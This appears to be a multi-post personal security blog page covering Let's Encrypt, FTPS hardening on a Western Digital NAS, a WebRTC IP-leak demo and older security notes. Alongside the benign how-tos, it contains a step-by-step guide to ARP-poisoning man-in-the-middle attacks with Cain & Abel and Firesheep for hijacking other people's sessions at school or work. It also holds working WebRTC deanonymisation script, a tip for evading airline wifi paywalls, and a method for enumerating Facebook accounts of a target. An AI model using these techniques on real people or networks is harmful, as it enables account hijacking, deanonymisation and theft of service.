Hackviking: He killed Chuck Norris, he ruled dancing so he took up a new hobby…

20 Jul 2017

Free SSL certificates

StartSSL certificates aren't trusted by several major browsers anymore, and the CA will probably lose all credibility and disappear from the market completely. In its place we have seen Let's Encrypt growth explode for the last 18 months. This post will cover some background and how to set up Let's Encrypt on your Amazon EC2 Apache-based server.


6 Mar 2017

Free in flight Wifi

For the last year and a half I have been flying back and forth between Sweden and San Francisco. Most of the airlines I fly have in-flight Wifi for a cost. Usually I think it's pretty reasonable money for the 11 hours or so I get a connection. But whenever I get bored I need a challenge, and I have found several ways to get around the payment wall.

Most airlines are pretty bad at blocking things like SSH proxies on unexpected ports or DNS tunneling. I realize that most people don't know how to do that or have a Linux box around that responds to SSH on all kinds of different ports. There are a few other tricks you can do as well.

Last time I flew from San Francisco to Frankfurt I found that I could either pay or log in with my account. Since I already had an account I opted for the "Reset my password" link and entered my e-mail. How would I be able to get my password? I didn't have any internet connection yet. Would they unblock the common ports for e-mail apps? No, they unblocked everything for 20 minutes. Enough for me to download an audio book and chat with my wife on Skype. Then it blocked again...

But I forgot to download my password, right... So I did a reset again and chatted with my wife for another 20 minutes for free. The third time it directed me to call customer support, but at least I got 40 minutes of free internet. After getting back to Sweden I Googled it; I couldn't have been the only one that found this, right?

I didn't find as much info as I thought I would on the different travel forums that I frequent, but there were a few posts. One similar to mine is this one: GENIUS FLIGHT HACK: Free Wi-Fi on US Air, AA, Delta, and More! It's basically the same principle but for downloading the airline app instead.

So if you just want to check something quickly or download something to listen to, this is an easy way to get around the payment firewall. From a legal point of view I can't really see any issues since they allow you any type of internet access after sending the "Reset my password" form. Their mistake is to open up all ports instead of just the e-mail ports and browsing to the most common webmail sites.

5 May 2016

WD NAS: Enable FTPS

Sending unencrypted FTP across the internet is a bad idea! You send your credentials in plain text, compromising access security as well as the data you're sending. My Book Live Duo has, as most NAS products, support for unencrypted FTP. Since it's based on vsftpd it's only a matter of configuration to make it a much more secure FTPS implementation instead. In this post I'm using my Western Digital My Book Live Duo, but this is applicable to most Western Digital NAS products and many other brands as well.

Enable SSH

First of all we need to enable SSH to be able to access more configuration options for the FTP service. By going to http://{WD IP-address}/UI/ssh you will see a screen where you can enable SSH access and get the root password.


After this we can connect to the Live Duo via SSH. I recommend that the first thing you do is change the root password; use the passwd command to accomplish this.

Create certificate

The My Book Live Duo, and probably most of the other models as well (since they share much of the firmware), already has openssl installed, which we can use to create the certificate. First we create a folder for the certificates and then generate them. I generate both 2048-bit and 4096-bit certificates since I want to test the performance difference (see below). You should not use the 1024-bit key length since that has been proven to be weak and can be broken.

mkdir /etc/ssl/ftp
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/ftp/vsftpd_2048.key -out /etc/ssl/ftp/vsftpd_2048.pem
openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout /etc/ssl/ftp/vsftpd_4096.key -out /etc/ssl/ftp/vsftpd_4096.pem

You will be asked a bunch of questions about location and other details. You can more or less put in whatever you like: since this is a self-signed certificate it will never be trusted automatically by clients anyway, so the information is pretty much irrelevant.

Configure FTP (vsftpd)

The My Book Live Duo already has an FTP service that you can enable from the UI. It uses vsftpd, which supports SSL and TLS (which is what we want here) as long as OpenSSL is available on the box, and apparently it is since we just generated the certificates with it. First we make a copy of the original conf file for safekeeping and then open it for editing.

cp /etc/vsftpd.conf /etc/vsftpd.conf.bak
nano /etc/vsftpd.conf

At the end of the file we add:

#SSL CONF
rsa_cert_file=/etc/ssl/ftp/vsftpd_2048.pem
rsa_private_key_file=/etc/ssl/ftp/vsftpd_2048.key

ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES

ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO

require_ssl_reuse=NO
ssl_ciphers=HIGH

Then CTRL + O to save and then CTRL + X to exit nano. Then we restart the FTP service.

/etc/init.d/vsftpd restart


Now you can try it from FileZilla, or whatever client software you like that supports FTPS. In FileZilla you will get a certificate warning where you can see the additional information you put in when you created the certificate.

Performance - 2048 vs 4096

The first run with the configuration above gave me around 8.9 MiB/s transfer speed and the CPU of the My Book Live Duo was at around 89%. I changed the certificates to the 4096-bit ones, restarted the service and tried again. I got more or less the same numbers with the longer key (which is expected, since the RSA key is only used in the TLS handshake while the transfer itself uses the negotiated symmetric cipher), so the CPU is not the bottleneck for the throughput. At the same time I'm not running any other services besides the SMB shares on this device.

Make backup of the config file

cp /etc/vsftpd.conf* /shares/Backup/

The backup is good to have if a firmware update changes the config file back. I have tried enabling and disabling the FTP service and that doesn't affect the configuration at least.
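Since a firmware update can silently revert the config, a small audit script is handy to run after each update. This is an added example, not code from the post or from Western Digital: it parses a vsftpd.conf and checks the TLS options used above; the EXPECTED table mirrors the post's settings and both sample configs are constructed.

```python
# Added example: audit a vsftpd.conf for the TLS settings the post relies on.
EXPECTED = {
    "ssl_enable": "YES",
    "force_local_logins_ssl": "YES",  # credentials only over TLS
    "force_local_data_ssl": "YES",    # file data only over TLS
    "allow_anon_ssl": "NO",
    "ssl_sslv2": "NO",                # SSLv2/SSLv3 are broken protocols
    "ssl_sslv3": "NO",
}

def parse_vsftpd_conf(text):
    """Return {key: value} from vsftpd.conf text, skipping comments and blanks."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, sep, value = line.partition("=")
            if sep:
                conf[key.strip()] = value.strip()
    return conf

def audit_vsftpd(text):
    """Return findings as strings; an empty list means every expected option is
    set explicitly to the expected value. Missing keys are reported rather than
    assumed, because vsftpd build defaults differ between versions."""
    conf = parse_vsftpd_conf(text)
    findings = []
    for key, want in EXPECTED.items():
        have = conf.get(key)
        if have is None:
            findings.append("%s not set (expected %s)" % (key, want))
        elif have.upper() != want:
            findings.append("%s=%s (expected %s)" % (key, have, want))
    for key in ("rsa_cert_file", "rsa_private_key_file"):
        if key not in conf:
            findings.append("%s not set" % key)
    return findings

# Constructed sample 1: the block the post appends to /etc/vsftpd.conf.
GOOD_CONF = """#SSL CONF
rsa_cert_file=/etc/ssl/ftp/vsftpd_2048.pem
rsa_private_key_file=/etc/ssl/ftp/vsftpd_2048.key
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
ssl_sslv2=NO
ssl_sslv3=NO
"""
# Constructed sample 2: TLS is on but optional, so plaintext logins still work.
WEAK_CONF = "ssl_enable=YES\nforce_local_logins_ssl=no\nssl_sslv3=YES\n"
```

Feed it the live file with `audit_vsftpd(open("/etc/vsftpd.conf").read())` on the NAS; any non-empty result means the config no longer forces TLS.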

5 Apr 2016

Comcast Xfinity: Disable XfinityWiFi

Never liked the additional SSID xfinitywifi that my Comcast router broadcasts. Whatever Comcast writes on their site, of course it affects my bandwidth and my overall wifi performance. If you log in to your customer pages at xfinity.com there is an option to disable it (outlined here). I also disabled my own wifi since the 2.4 GHz band is way too crowded where I live, but the wifi radio is still running in the router and quite frankly I don't trust Comcast on this issue. So why not just disable it altogether, especially if you're not using it? If you are still using it, any $50 wifi router will give you much better performance, so just use that instead!

6 Feb 2015

WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published an example of how to exploit the bug on GitHub. Firefox (Mozilla), Chrome and Internet Explorer (with a WebRTC plugin) are vulnerable to this bug. WebRTC is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using a VPN, the computer's internal network address will be exposed. WebRTC uses this mechanism to handle NAT on the network and be able to bind sessions to the public IP. However, the bug is really nasty because it exposes these functions to JavaScript, so the entire implementation below is made with JavaScript. The request is not registered in the developer console and cannot be blocked by plugins.

If the user is using a lightweight VPN client, like a Chrome plugin, the VPN will be bypassed altogether and both the real public IP and the internal NAT address will be shown.

Below there is a demo; if you see your public and private IP, your browser is vulnerable to this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

<ul id="localip"></ul>

Your public IP addresses:

<ul id="publicip"></ul>

<script>
function getIPs(){
    var ip_dups = {};
    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
    //firefox already has a default stun server in about:config
    // media.peerconnection.default_iceservers =
    // [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;
    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);
    //listen for candidate events
    pc.onicecandidate = function(ice){
        //skip non-candidate events
        if(ice.candidate){
            //match just the IPv4 address; skip candidates that carry none
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            var match = ip_regex.exec(ice.candidate.candidate);
            if(!match) return;
            var ip_addr = match[1];
            //remove duplicates: only the first candidate per address is listed
            if(ip_dups[ip_addr] === undefined){
                var li = document.createElement("li");
                li.textContent = ip_addr;
                //local (RFC 1918 and link-local) IPs
                if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                    document.getElementById("localip").appendChild(li);
                //assume the rest are public IPs
                else
                    document.getElementById("publicip").appendChild(li);
            }
            ip_dups[ip_addr] = true;
        }
    };
    //create a bogus data channel
    pc.createDataChannel("");
    //create an offer sdp (legacy callback API, as in the original demo)
    pc.createOffer(function(result){
        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});
    }, function(){});
}
getIPs();
</script>
      

26 Sep 2014

Check for shellshock


So the new issue on the board is Shellshock? Not really, it has been around for 20 years but hasn't been a problem until now. Same with Heartbleed: it was there for over two years before it was discovered. I will show you how to check if you're affected and how to stay safe.


25 Sep 2014

Open Source: A false sense of security


The Heartbleed vulnerability dropped like a bombshell: a large majority of web servers on the internet were sharing their memory with the world. The even bigger bombshell was that the vulnerability had existed for over two years. Most people consider open source more secure than proprietary code since anyone can verify that it's safe. The problem is that most people think that someone else has already done that!


4 Nov 2012

Viewing Axis webcam from iPhone

I just installed an Axis webcam at home to keep tabs on my home when I'm not there. I tried a few apps for my iPhone to use the cam as easily as possible. I found four free apps for Axis cameras but only one that actually was usable.

Netcamviewer - Doesn't support SSL.

CamControl - Works great! Or at least it's the only one that supports SSL.

CamViewer - Looks really unprofessional, doesn't support SSL.

CamSee - Doesn't support SSL.

26 Jun 2012

Facebook login open to enumeration

The error message above is in Swedish; the short version: "The e-mail address you entered isn't connected to any account in our system." So instead of telling me that my username / password combo was unsuccessful they actually help me with half the problem. If they had only told me that the username and password combo was bad I wouldn't know if I had the correct e-mail address for the account I'm interested in. So I will just try the different e-mail addresses I know of for my intended target with some bullshit password until I get the "wrong password" error, and then I know what e-mail they use. Really not good, Facebook!
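The fix on the server side is a single failure message for both the unknown-account and wrong-password cases, plus doing the same amount of hashing work either way so response time doesn't give the answer instead. This is an added example, not Facebook's code or anything from the post: a leaky handler beside a uniform one, with a small oracle you can point at your own login function. The account, salt and passwords are constructed demo values.

```python
# Added example: the enumeration oracle the post describes beside a uniform
# login. Accounts, salt and passwords below are constructed demo values.
import hashlib
import hmac

_SALT = b"constructed-demo-salt"  # a real system stores a per-user random salt

def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 50_000)

USERS = {"alice@example.com": _hash("correct horse")}
# A dummy hash so unknown e-mails cost the same work as a wrong password.
_DUMMY = _hash("dummy")

def login_leaky(email, password):
    """Mirrors the behaviour the post describes: the message tells the caller
    which half of the credential was wrong, so account existence leaks."""
    stored = USERS.get(email)
    if stored is None:
        return (False, "no account with that e-mail address")
    if not hmac.compare_digest(stored, _hash(password)):
        return (False, "wrong password")
    return (True, "ok")

def login_uniform(email, password):
    """Same check, one message for every failure. The hash is computed even
    for unknown e-mails so response time does not reveal account existence."""
    stored = USERS.get(email, _DUMMY)
    ok = hmac.compare_digest(stored, _hash(password)) and email in USERS
    return (ok, "ok" if ok else "wrong e-mail address or password")

def leaks_account_existence(login):
    """Test oracle for your own login handler: does a wrong password on a known
    account produce a different message than one on an unknown account?"""
    _, known = login("alice@example.com", "not the password")
    _, unknown = login("nobody@example.com", "not the password")
    return known != unknown
```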

26 Oct 2010

Hacking Facebook, Twitter and more…

No one has missed the release of Firesheep, I hope. The new easy way to hack your way into other people's accounts on Facebook, Twitter, WordPress, Flickr, Google and more. The exploit is a plugin for Firefox that captures network traffic and intercepts the session cookies from the sites. This isn't new to anyone, but it's the way it's implemented that is nice and will get people moving to fix their broken sites. If you can't scale up your service safely with SSL you shouldn't scale up at all. When you have installed the plugin in Firefox just hit "Start Capturing" and whenever it finds a service cookie it will pop up with the username and picture.

It's been announced that this is an exploit for unprotected wireless networks, but that isn't entirely true. If you use a simple man-in-the-middle attack you can capture the traffic on a wired network you have access to in your school or at your workplace. There are simple ways of doing this.

1. Download Cain & Abel and install it! (http://www.oxid.it/cain.html)
2. Download WinPcap and install it! (http://www.winpcap.org/install/default.htm)
3. Download Firesheep and install it; if your browser saves it as a .zip file, rename it to .xpi. Then just open the Firefox menu "Tools" -> "Add-ons" and drag-and-drop the file into the window. (http://github.com/codebutler/firesheep/downloads)
4. Read this how-to and do a man-in-the-middle attack on your current network. (http://skateass.com/wordpress/cain-arp-poisoning-cracking-and-sniffing-passwords-and-packets/)
5. Start Firefox, go to "View" -> "Sidebar" -> "Firesheep" then hit "Start Capturing". Now all the sessions created to the sites will be at your disposal.

You can even create custom site profiles in Firesheep and capture other services than the ones already in there.

What else do you want to read about? Please hit me with some comments!
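What Firesheep replays is a session cookie that the site let travel over plain HTTP. The check a site owner wants is whether their own responses set session cookies without the Secure and HttpOnly flags and without HSTS. This is an added example, not Firesheep's code or anything from the post: it parses a raw HTTP response head and reports those findings; both sample responses are constructed.

```python
# Added example: audit a site's own HTTP response for the cookie and transport
# settings that stop a sniffer from replaying the session. Samples are constructed.
def parse_headers(raw):
    """Return [(name, value)] from a raw HTTP response head (CRLF separated)."""
    pairs = []
    for line in raw.split("\r\n")[1:]:  # skip the status line
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs

def audit_session_cookies(raw):
    """Findings for each Set-Cookie that can travel in the clear or be read by
    script, plus a missing HSTS header; an empty list means nothing was found."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, *attrs = [part.strip() for part in value.split(";")]
        cname = cookie.split("=", 1)[0]
        flags = {attr.split("=", 1)[0].lower() for attr in attrs}
        if "secure" not in flags:
            findings.append("%s: missing Secure (sent over plain HTTP)" % cname)
        if "httponly" not in flags:
            findings.append("%s: missing HttpOnly (readable by script)" % cname)
    if not any(name == "strict-transport-security" for name, _ in headers):
        findings.append("no Strict-Transport-Security header")
    return findings

# Constructed responses: the kind of cookie Firesheep replays, and a hardened one.
WEAK_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                 "Set-Cookie: sessionid=abc123; Path=/\r\n"
                 "Content-Type: text/html\r\n\r\n")
GOOD_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                 "Strict-Transport-Security: max-age=31536000\r\n"
                 "Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly\r\n\r\n")
```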